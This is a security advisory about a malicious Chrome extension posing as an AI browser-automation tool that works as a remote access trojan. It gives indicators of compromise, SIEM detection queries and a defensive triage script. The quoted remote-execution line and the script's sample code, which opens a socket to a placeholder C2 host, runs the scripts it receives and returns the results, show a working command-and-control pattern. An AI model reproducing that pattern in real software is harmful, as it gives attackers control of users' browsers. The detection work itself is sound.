Remote Access Trojan (RAT) Disguised as AI-Based Browser Control Extension

    Date: 02/13/2026

    Severity: Medium

    Summary

    The Chrome extension “Chrome MCP Server - AI Browser Control” operates as a browser-based Remote Access Trojan (RAT). It is disguised as an AI automation tool and falsely claims that all processing is 100% local. Once enabled, it connects via WebSocket to a live C2 server. The server assigns sessionId and connectionId values without authentication, enabling structured remote control. It supports 30+ remote commands, including JavaScript execution, traffic interception, screenshots, history access, and cookie-based request replay. Remote code execution is achieved through `new Function("return " + data.params.script)()`, which runs attacker-supplied scripts in the active browser tab.
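    A static triage check for the behaviour described in the summary, added here as an example (not code from the extension, Gurucul or Unit 42): it scans extension source for a non-loopback WebSocket endpoint together with `new Function`/`eval` calls built from runtime values. The sample source, the `c2.example.invalid` placeholder host and all function names are constructed for illustration.

```javascript
// Constructed sample standing in for an unpacked extension's background script.
const SAMPLE_SOURCE = [
  'const ws = new WebSocket("wss://c2.example.invalid/chrome");',
  'ws.onmessage = (ev) => {',
  '  const data = JSON.parse(ev.data);',
  '  const result = new Function("return " + data.params.script)();',
  '  ws.send(JSON.stringify({ id: data.id, result }));',
  '};',
  'const local = new WebSocket("ws://127.0.0.1:9222/devtools");',
  'const add = new Function("a", "b", "return a + b");',
].join("\n");

const LOOPBACK = new Set(["localhost", "127.0.0.1", "[::1]"]);

// WebSocket URLs in string literals whose host is not loopback (contradicts "100% local").
function findRemoteWebSockets(source) {
  const hits = [];
  for (const m of source.matchAll(/["'`](wss?:\/\/[^"'`\s]+)["'`]/g)) {
    let host;
    try { host = new URL(m[1]).hostname; } catch { continue; }
    if (!LOOPBACK.has(host)) hits.push({ url: m[1], host });
  }
  return hits;
}

// new Function(...) / eval(...) calls whose arguments are not only string literals.
function findDynamicCode(source) {
  const literal = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'/g;
  const hits = [];
  source.split("\n").forEach((text, i) => {
    const m = text.match(/\b(new\s+Function|eval)\s*\((.*)\)/);
    if (!m) return;
    // Drop literals and punctuation; whatever remains is a runtime value.
    const dynamic = m[2].replace(literal, "").replace(/[\s,()+;]/g, "");
    if (dynamic) hits.push({ line: i + 1, call: m[1].replace(/\s+/g, " "), dynamic });
  });
  return hits;
}

// Flag only when both traits co-occur: remote channel plus runtime-built code.
function triage(source) {
  const remoteSockets = findRemoteWebSockets(source);
  const dynamicCode = findDynamicCode(source);
  const suspicious = remoteSockets.length > 0 && dynamicCode.length > 0;
  return { remoteSockets, dynamicCode, suspicious };
}

console.log(JSON.stringify(triage(SAMPLE_SOURCE), null, 2));
```

    The check is line-based and regex-driven, so minified or obfuscated extension code needs to be beautified first; a hit is a lead for manual review, not a verdict.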

    Indicators of Compromise (IOC) List

    Domains/URLs:

    wss://mcp-browser.qubecare.ai/chrome

    https://mcp-browser.qubecare.ai/mcp

    mcp-browser.qubecare.ai

    qubecare.ai

    IP Address:

    162.245.187.98

    Hashes (SHA-256):

    0cbf101e96f6d5c4146812f07105f8b89bd76dd994f540470cd1c4bc37df37d5

    81716da5b6de987436bacae526b4e4a59e80f7f2897d1541716a6d11e2261acd

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    domainname like "wss://mcp-browser.qubecare.ai/chrome" or url like "wss://mcp-browser.qubecare.ai/chrome" or siteurl like "wss://mcp-browser.qubecare.ai/chrome" or domainname like "https://mcp-browser.qubecare.ai/mcp" or url like "https://mcp-browser.qubecare.ai/mcp" or siteurl like "https://mcp-browser.qubecare.ai/mcp" or domainname like "mcp-browser.qubecare.ai" or url like "mcp-browser.qubecare.ai" or siteurl like "mcp-browser.qubecare.ai" or domainname like "qubecare.ai" or url like "qubecare.ai" or siteurl like "qubecare.ai" 

    Detection Query 2:

    dstipaddress IN ("162.245.187.98") or srcipaddress IN ("162.245.187.98")

    Detection Query 3:

    sha256hash In ("0cbf101e96f6d5c4146812f07105f8b89bd76dd994f540470cd1c4bc37df37d5","81716da5b6de987436bacae526b4e4a59e80f7f2897d1541716a6d11e2261acd")

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-02-11-IOCs-for-RAT-disguinsed-as-AI-based-browser-extension.txt


    Tags

    Malware, RAT, AI
